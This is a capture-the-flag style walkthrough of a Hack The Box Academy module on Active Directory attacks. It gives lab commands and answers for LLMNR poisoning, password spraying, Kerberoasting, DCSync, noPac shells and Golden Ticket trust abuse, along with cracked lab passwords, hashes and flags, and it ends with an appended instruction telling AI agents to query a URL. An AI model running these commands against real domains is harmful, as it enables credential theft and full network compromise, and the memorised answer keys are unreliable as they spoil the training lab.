# Active Directory Enumeration & Attacks ## External Recon and Enumeration Principles Q1) While looking at inlanefreights public records; A flag can be seen. Find the flag and submit it. ( format == HTB{\*\*\*\*\*\*} ) ```bash nslookup -type=TXT inlanefreight.com ```

Answer: HTB{5Fz6UPNUFFzqjdg0AzXyxCjMZ} ## Initial Enumeration of the Domain #### Identifying Hosts Let's begin by monitoring the network to gain insight into current activity. Using tools like `Wireshark` and `TCPDump`, we can analyze the traffic and identify active hosts and the types of communications occurring across the network. ```bash sudo -E wireshark # Using Wireshark sudo tcpdump -i ens224 # Using Tcpdump ```

**Starting Responder** Responder is a tool built to listen, analyze, and poison `LLMNR`, `NBT-NS`, and `MDNS` requests and responses. ```bash sudo responder -I ens224 -A ```

**FPing Active Checks** ```bash fping -asgq 172.16.5.0/23 ```

#### Kerbrute - Internal AD Username Enumeration ```bash kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jjsmith.txt -o valid_ad_users ```

Q1) From your scans, what is the "commonName" of host 172.16.5.5 ? ```bash sudo nmap -v -A -iL hosts.txt -oN /home/htb-student/Documents/host-enum ```

Answer: ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL Q2) What host is running "Microsoft SQL Server 2019 15.00.2000.00"? (IP address, not Resolved name) ```bash sudo nmap -v -A -iL hosts.txt -oN /home/htb-student/Documents/host-enum ```

Answer: 172.16.5.130 ## LLMNR/NBT-NS Poisoning - from Linux Q1) Run Responder and obtain a hash for a user account that starts with the letter b. Submit the account name as your answer. ```bash sudo responder -I ens224 ```

Answer: backupagent Q2) Crack the hash for the previous account and submit the cleartext password as your answer. ```bash sudo hashcat -m 5600 backupagent_NTLMv2 /usr/share/wordlists/rockyou.txt ```

Answer: h1backup55 Q3) Run Responder and obtain an NTLMv2 hash for the user wley. Crack the hash using Hashcat and submit the user's password as your answer.

```bash sudo hashcat -m 5600 wley_NTLMv2 /usr/share/wordlists/rockyou.txt ```

Answer: transporter\@4 ## LLMNR/NBT-NS Poisoning - from Windows #### Using Inveigh ```powershell Import-Module .\Inveigh.ps1 Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y ```

#### C# Inveigh (InveighZero) ```bash .\Inveigh.exe ```

Q1) Run Inveigh and capture the NTLMv2 hash for the svc\_qualys account. Crack and submit the cleartext password as the answer. ```bash .\Inveigh.exe GET NTLMV2UNIQUE ```

```bash sudo hashcat -m 5600 svc_qualys /usr/share/wordlists/rockyou.txt ```

Answer: security#1 ## Enumerating & Retrieving Password Policies #### Enumerating the Password Policy - from Linux - Credentialed ```bash crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol ```

#### SMB NULL Sessions ```bash rpcclient -U "" -N 172.16.5.5 getdompwinfo ```

**Using enum4linux** ```bash enum4linux -P 172.16.5.5 ```

**Using enum4linux-ng** ```bash enum4linux-ng -P 172.16.5.5 -oA ilfreight ```

#### Enumerating the Password Policy - from Linux - LDAP Anonymous Bind ```bash ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength ```

#### Enumerating the Password Policy - from Windows ```bash net use \\DC01\ipc$ "" /u:"" net accounts Get-DomainPolicy # From Powerview ``` Q1) What is the default Minimum password length when a new domain is created? (One number) Answer: 7 Q2) What is the minPwdLength set to in the INLANEFREIGHT.LOCAL domain? (One number) ```bash crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol ```

Answer: 8 ### Password Spraying - Making a Target User List #### SMB NULL Session to Pull User List ```bash enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]" ```

**Using rpcclient** ```bash rpcclient -U "" -N 172.16.5.5 ```

**Using CrackMapExec --users Flag** ```bash crackmapexec smb 172.16.5.5 --users ```

#### Gathering Users with LDAP Anonymous ```bash ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" " ```

```bash ./windapsearch.py --dc-ip 172.16.5.5 -u "" -U ```

Q1) Enumerate valid usernames using Kerbrute and the wordlist located at /opt/jsmith.txt on the ATTACK01 host. How many valid usernames can we enumerate with just this wordlist from an unauthenticated standpoint? ```bash kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt ```

Answer: 56 ## Internal Password Spraying - from Linux #### **Using a Bash one-liner for the Attack** ```bash for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done ```

#### **Using Kerbrute for the Attack** ```bash kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1 ```

**Using CrackMapExec & Filtering Logon Failures** ```bash sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep + ```

#### **Validating the Credentials with CrackMapExec** ```bash sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123 ```

#### **Local Admin Spraying with CrackMapExec** ```bash sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep + ``` The `--local-auth` flag will tell the tool only to attempt to log in one time on each machine which removes any risk of account lockout. Make sure this flag is set so we don't potentially lock out the built-in administrator for the domain. Q1) Find the user account starting with the letter "s" that has the password Welcome1. Submit the username as your answer. ```bash for u in $(cat valid_usernames.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done sudo crackmapexec smb 172.16.5.5 -u sgage -p Welcome1 ```

Answer: sgage ## Internal Password Spraying - from Windows Q1) Using the examples shown in this section, find a user with the password Winter2022. Submit the username as the answer. ```powershell Invoke-DomainPasswordSpray -Password Winter2022 -OutFile spray_success -ErrorAction SilentlyContinue ```

Answer: dbranch ## Enumerating Security Controls #### **Checking the Status of Defender with Get-MpComputerStatus** ```powershell Get-MpComputerStatus ```

#### **Using Get-AppLockerPolicy cmdlet** ```powershell Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections ``` #### **Enumerating Language Mode** ```powershell $ExecutionContext.SessionState.LanguageMode ```

### LAPS The Microsoft [Local Administrator Password Solution (LAPS)](https://www.microsoft.com/en-us/download/details.aspx?id=46899) is used to randomize and rotate local administrator passwords on Windows hosts and prevent lateral movement. #### **Enumerating LAPS** ```powershell Find-LAPSDelegatedGroups Find-AdmPwdExtendedRights Get-LAPSComputers ``` ## Credentialed Enumeration - from Linux #### **CME - Domain User Enumeration** ```bash sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users ```

#### **CME - Domain Group Enumeration** ```bash sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups ```

#### **CME - Logged On Users** ```bash sudo crackmapexec smb 172.16.5.130 -u forend -p Klmcargo2 --loggedon-users ```

#### **CME Share Searching** ```bash sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares ```

#### **Spider\_plus** ```bash sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share 'Department Shares' ```

#### **SMBMap To Check Access** ```bash smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 ```

#### **Recursive List Of All Directories** ```bash smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R 'Department Shares' --dir-only ```

#### **SMB NULL Session with rpcclient** ```bash rpcclient -U "" -N 172.16.5.5 ``` #### **RPCClient User Enumeration By RID** ```bash queryuser 0x457 ```

#### **Enumdomusers** ```bash enumdomusers ```

### Impacket Toolkit ```bash psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125 wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5 python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 --da # Windapsearch - Domain Admins python3 windapsearch.py --dc-ip 172.16.5.5 -u forend@inlanefreight.local -p Klmcargo2 -PU # Windapsearch - Privileged Users ``` ### Bloodhound.py ```basic sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all ``` Q1) What AD User has a RID equal to Decimal 1170? Let's begin by converting this number from decimal to hexadecimal.

```bash queryuser 0x492 ```

Answer: mmorgan Q2) What is the membercount: of the "Interns" group? ```bash sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups | grep -i "interns" ```

## Credentialed Enumeration - from Windows #### Get Domain Info ```powershell Import-Module ActiveDirectory Get-ADDomain ```

```powershell Get-ADUser ```

#### **Checking For Trust Relationships** ```powershell Get-ADTrust -Filter * ```

#### **Group Enumeration** ```powershell Get-ADGroup -Filter * | select name ```

#### **Detailed Group Info** ```powershell Get-ADGroup -Identity "Backup Operators" ```

### PowerView | **Command** | **Description** | | ----------------------------------- | ------------------------------------------------------------------------------------------ | | `Export-PowerViewCSV` | Append results to a CSV file | | `ConvertTo-SID` | Convert a User or group name to its SID value | | `Get-DomainSPNTicket` | Requests the Kerberos ticket for a specified Service Principal Name (SPN) account | | **Domain/LDAP Functions:** | | | `Get-Domain` | Will return the AD object for the current (or specified) domain | | `Get-DomainController` | Return a list of the Domain Controllers for the specified domain | | `Get-DomainUser` | Will return all users or specific user objects in AD | | `Get-DomainComputer` | Will return all computers or specific computer objects in AD | | `Get-DomainGroup` | Will return all groups or specific group objects in AD | | `Get-DomainOU` | Search for all or specific OU objects in AD | | `Find-InterestingDomainAcl` | Finds object ACLs in the domain with modification rights set to non-built in objects | | `Get-DomainGroupMember` | Will return the members of a specific domain group | | `Get-DomainFileServer` | Returns a list of servers likely functioning as file servers | | `Get-DomainDFSShare` | Returns a list of all distributed file systems for the current (or specified) domain | | **GPO Functions:** | | | `Get-DomainGPO` | Will return all GPOs or specific GPO objects in AD | | `Get-DomainPolicy` | Returns the default domain policy or the domain controller policy for the current domain | | **Computer Enumeration Functions:** | | | `Get-NetLocalGroup` | Enumerates local groups on the local or a remote machine | | `Get-NetLocalGroupMember` | Enumerates members of a specific local group | | `Get-NetShare` | Returns open shares on the local (or a remote) machine | | `Get-NetSession` | Will return session information for the local (or a remote) machine | | `Test-AdminAccess` | Tests if the current user has administrative access to the local (or a remote) machine | | **Threaded 'Meta'-Functions:** | | | `Find-DomainUserLocation` | Finds machines where specific users are logged in | | `Find-DomainShare` | Finds reachable shares on domain machines | | `Find-InterestingDomainShareFile` | Searches for files matching specific criteria on readable shares in the domain | | `Find-LocalAdminAccess` | Find machines on the local domain where the current user has local administrator access | | **Domain Trust Functions:** | | | `Get-DomainTrust` | Returns domain trusts for the current domain or a specified domain | | `Get-ForestTrust` | Returns all forest trusts for the current forest or a specified forest | | `Get-DomainForeignUser` | Enumerates users who are in groups outside of the user's domain | | `Get-DomainForeignGroupMember` | Enumerates groups with users outside of the group's domain and returns each foreign member | | `Get-DomainTrustMapping` | Will enumerate all trusts for the current domain and any others seen. | #### **Domain User Information** ```powershell Get-DomainUser -Identity mmorgan -Domain inlanefreight.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol ```

#### **Recursive Group Membership** ```powershell Get-DomainGroupMember -Identity "Domain Admins" -Recurse ```

#### **Trust Enumeration** ```powershell Get-DomainTrustMapping ```

#### **Testing for Local Admin Access** ```powershell Test-AdminAccess -ComputerName ACADEMY-EA-MS01 ```

#### **Finding Users With SPN Set** ```powershell Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName ```

### SharpView Here we can use SharpView to enumerate information about a specific user, such as the user `forend`, which we control. ```powershell .\SharpView.exe Get-DomainUser -Identity forend ```

### Snaffler [Snaffler](https://github.com/SnaffCon/Snaffler) is a tool that can help us acquire credentials or other sensitive data in an Active Directory environment. Snaffler works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories. ```powershell .\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data ```

Q1) Using Bloodhound, determine how many Kerberoastable accounts exist within the INLANEFREIGHT domain. ```powershell Import-Module .\PowerView.ps1 Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName ```

Q2) What PowerView function allows us to test if a user has administrative access to a local or remote host? ```powershell Test-AdminAccess -ComputerName ACADEMY-EA-MS01 ```

Answer: Test-AdminAccess Q3) Run Snaffler and hunt for a readable web config file. What is the name of the user in the connection string within the file? ```powershell .\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data ```

Answer: sa Q4) What is the password for the database user? Answer: ILFREIGHTDB01! ## Living Off the Land Q1) Enumerate the host's security configuration information and provide its AMProductVersion. ```powershell Get-MpComputerStatus ```

Q2) What domain user is explicitly listed as a member of the local Administrators group on the target host? ```bash net localgroup administrators ```

Answer: adunn Q3) Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer. ```bash dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))" -attr distinguishedName userAccountControl, description ```

Answer: HTB{LD\@P\_I$\_W1ld} ## Kerberoasting - from Linux Q1) Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer. ```bash GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user SAPService ```

```bash hashcat -m 13100 SAPService /usr/share/wordlists/rockyou.txt ```

Answer: !SapperFi2 Q2) What powerful local group on the Domain Controller is the SAPService user a member of? ```bash GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/SAPService | grep 'SAPService' ```

Answer: Account Operators ## Kerberoasting - from Windows Q1) What is the name of the service account with the SPN 'vmware/inlanefreight.local'? ```powershell Get-DomainUser * -spn | select samaccountname ```

Answer: svc\_vmwaresso Q2) Crack the password for this account and submit it as your answer. ```powershell .\Rubeus.exe kerberoast /user:svc_vmwaresso /nowrap ```

```bash hashcat -m 13100 svc_vm_tgs /usr/share/wordlists/rockyou.txt ```

Answer: Virtual01 ## Access Control List (ACL) Abuse Primer Q1) What type of ACL defines which security principals are granted or denied access to an object? (one word) Answer: DACL Q2) Which ACE entry can be leveraged to perform a targeted Kerberoasting attack? Answer: GenericAll ## ACL Enumeration Q1) What is the rights GUID for User-Force-Change-Password? ```powershell $sid = Convert-NameToSid wley Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} ```

```powershell $sid = Convert-NameToSid wley Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid} ```

Or from here:

Answer: 00299570-246d-11d0-a768-00aa006e0529 Q2) What flag can we use with PowerView to show us the ObjectAceType in a human-readable format during our enumeration? Answer: ResolveGUIDs Q3) What privileges does the user damundsen have over the Help Desk Level 1 group? ```powershell $sid2 = Convert-NameToSid damundsen Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} -Verbose ```

Answer: GenericWrite Q4) Using the skills learned in this section, enumerate the ActiveDirectoryRights that the user forend has over the user dpayne (Dagmar Payne). ```powershell $sid2 = Convert-NameToSid forend Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid2} ```

Answer: GenericAll Q5) What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) ```powershell .\SharpHound.exe -c All --zipfilename ILFREIGHT ```

Next, let's upload this ZIP file to the BloodHound GUI for analysis. I selected **** as the starting node. Then, from the **Node Info** tab, I scrolled down to the **`Outbound Control Rights`** section, followed by **`First Degree Object Control`**.

Answer: Self-Membership ## ACL Abuse Tactics Q1) Work through the examples in this section to gain a better understanding of ACL abuse and performing these skills hands-on. Set a fake SPN for the adunn account, Kerberoast the user, and crack the hash using Hashcat. Submit the account's cleartext password as your answer. Given that we have **GenericAll** permissions on this account, we can conduct a targeted Kerberoasting attack by modifying the account's **servicePrincipalName (SPN)** attribute to register a fake SPN. This will allow us to request a **Ticket Granting Service (TGS)** ticket, which we can then extract and attempt to crack offline using **Hashcat**. ```powershell Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose ```

```powershell .\Rubeus.exe kerberoast /user:adunn /nowrap ```

Let's save this TGS to a file and attempt to crack it using Hashcat. ```bash hashcat -m 13100 adunn_TGS /usr/share/wordlists/rockyou.txt ```

Answer: SyncMaster757 ## DCSync Q1) Perform a DCSync attack and look for another user with the option "Store password using reversible encryption" set. Submit the username as your answer. ```powershell Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl ```

Answer: syncron Q2) What is this user's cleartext password? ```bash secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5 ```

Answer: Mycleart3xtP\@ss! Q3) Perform a DCSync attack and submit the NTLM hash for the khartsfield user as your answer. ```bash secretsdump.py -outputfile inlanefreight_hashes -just-dc-user khartsfield INLANEFREIGHT/adunn@172.16.5.5 ```

Answer: 4bb3b317845f0954200a6b0acc9b9f9a ## Privileged Access Q1) What other user in the domain has CanPSRemote rights to a host? ```bash MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2 ```

Answer: bdavis Q2) What host can this user access via WinRM? (just the computer name)

Answer: ACADEMY-EA-DC01 Q3) Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt. ```bash mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth ```

Answer: 1m\_the\_sQl\_@dm1n\_n0w! ## Bleeding Edge Vulnerabilities Q1) Which two CVEs indicate NoPac.py may work? (Format: ####-#####\&####-#####, no spaces) Answer: 2021-42278&2021-42287 Q2) Apply what was taught in this section to gain a shell on DC01. Submit the contents of flag.txt located in the DailyTasks directory on the Administrator's desktop. First, let's determine whether the system is vulnerable. ```bash sudo python3 /opt/noPac/scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap ```

Next, we will attempt to obtain a shell with SYSTEM-level privileges by executing `noPac.py`. This tool allows us to impersonate the built-in Administrator account and initiate a semi-interactive shell session on the target Domain Controller. ```bash sudo python3 /opt/noPac/noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap ```

Answer: D0ntSl\@ckonN0P\@c! ## Miscellaneous Misconfigurations Q1) Find another user with the passwd\_notreqd field set. Submit the samaccountname as your answer. The samaccountname starts with the letter "y". ```powershell Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol ```

Answer: ygroce Q2) Find another user with the "Do not require Kerberos pre-authentication setting" enabled. Perform an ASREPRoasting attack against this user, crack the hash, and submit their cleartext password as your answer. First, let's find the user that do not require pre authentiation. ```powershell Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl ```

Next, let's retrieve the AS-REP in the proper format for offline hash cracking. ```powershell .\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat ```

```bash hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt ```

Answer: Pass\@word ## Domain Trusts Primer Q1) What is the child domain of INLANEFREIGHT.LOCAL? (format: FQDN, i.e., DEV.ACME.LOCAL)

Import-Module ActiveDirectory
Get-ADTrust -Filter *

Answer: LOGISTICS.INLANEFREIGHT.LOCAL Q2) What domain does the INLANEFREIGHT.LOCAL domain have a forest transitive trust with?

Answer: FREIGHTLOGISTICS.LOCAL Q3) What direction is this trust?

Answer: Bidirectional ## Attacking Domain Trusts - Child -> Parent Trusts - from Windows Q1) What is the SID of the child domain? ```powershell Import-Module .\PowerView.ps1 Get-DomainSID ```

Answer: S-1-5-21-2806153819-209893948-922872689 Q2) What is the SID of the Enterprise Admins group in the root domain? ```powershell Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid ```

Answer: S-1-5-21-3842939050-3880317879-2865463114-519 Q3) Perform the ExtraSids attack to compromise the parent domain. Submit the contents of the flag.txt file located in the c:\ExtraSids folder on the ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL domain controller in the parent domain. First, let's retrieve the hash of the **krbtgt** account. ```powershell .\mimikatz.exe lsadump::dcsync /user:LOGISTICS\krbtgt ```

We now have the **krbtgt hash**, the **SID of the Enterprise Admins group**, and the **SID of the child domain**, which enables us to **create a Golden Ticket.** ```powershell kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt ```

Now we can get the flag ```powershell cat \\academy-ea-dc01.inlanefreight.local\c$\ExtraSids\flag.txt ```

Answer: f\@ll1ng\_l1k3\_d0m1no3$ ## Attacking Domain Trusts - Child -> Parent Trusts - from Linux Q1) Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer. First, let's retrieve the hash of the **krbtgt** account. ```bash secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt ```

Next, we need to get the SID of the child domain ```bash lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 ```

Next, we can rerun the command, targeting the INLANEFREIGHT Domain Controller (DC01) at 172.16.5.5 and grab the domain `SID` . ```bash lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins" ```

Next, we can use **`ticketer.py`** from the **Impacket toolkit** to generate a Golden Ticket, which grants access to resources in both the **child** and **parent domains**. ```bash ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker ```

The ticket will be stored in our system as a credential cache (ccache) file, which holds Kerberos credentials. By setting the `KRB5CCNAME` environment variable, the system is directed to use this file for Kerberos authentication. ```bash export KRB5CCNAME=hacker.ccache ```

Now, we need to check if we can successfully authenticate to the parent domain's Domain Controller. ```bash psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5 ```

Impacket also has the tool `raiseChild.py`, which will automate escalating from child to parent domain. ```bash raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm ```

Let's retrieve the NTLM hash for the domain administrator account, **bross**. ```bash secretsdump.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5 | grep "bross" ```

Answer: 49a074a39dd0651f647e765c2cc794c7 ## Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows Q1) Perform a cross-forest Kerberoast attack and obtain the TGS for the mssqlsvc user. Crack the ticket and submit the account's cleartext password as your answer. We can use PowerView to enumerate accounts within the target domain that have associated Service Principal Names (SPNs). ```powershell Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName ```

Let's perform a Kerberoasting attack across the trust using `Rubeus`. ```powershell .\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap ```

Let's save the hash to a file and attempt to crack it using Hashcat in order to retrieve the plaintext password. ```bash hashcat -m 13100 mssqlsvc_tgs /usr/share/wordlists/rockyou.txt ```

Answer: 1logistics ## Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux Q1) Kerberoast across the forest trust from the Linux attack host. Submit the name of another account with an SPN aside from MSSQLsvc. We have obtained the password for the user account **wley** before, which is **transporter\@4**. ```bash GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley ```

Answer: sapsso Q2) Crack the TGS and submit the cleartext password as your answer. ```bash GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley ```

```bash hashcat -m 13100 sapsso_tgs /usr/share/wordlists/rockyou.txt ```

Answer: pabloPICASSO Q3) Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop. ``` psexec.py ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL/sapsso:pabloPICASSO@172.16.5.238 ```

Answer: burn1ng\_d0wn\_th3\_f0rest! --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://faresbltagy.gitbook.io/footprintinglabs/active-directory-enumeration-and-attacks/active-directory-enumeration-and-attacks.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.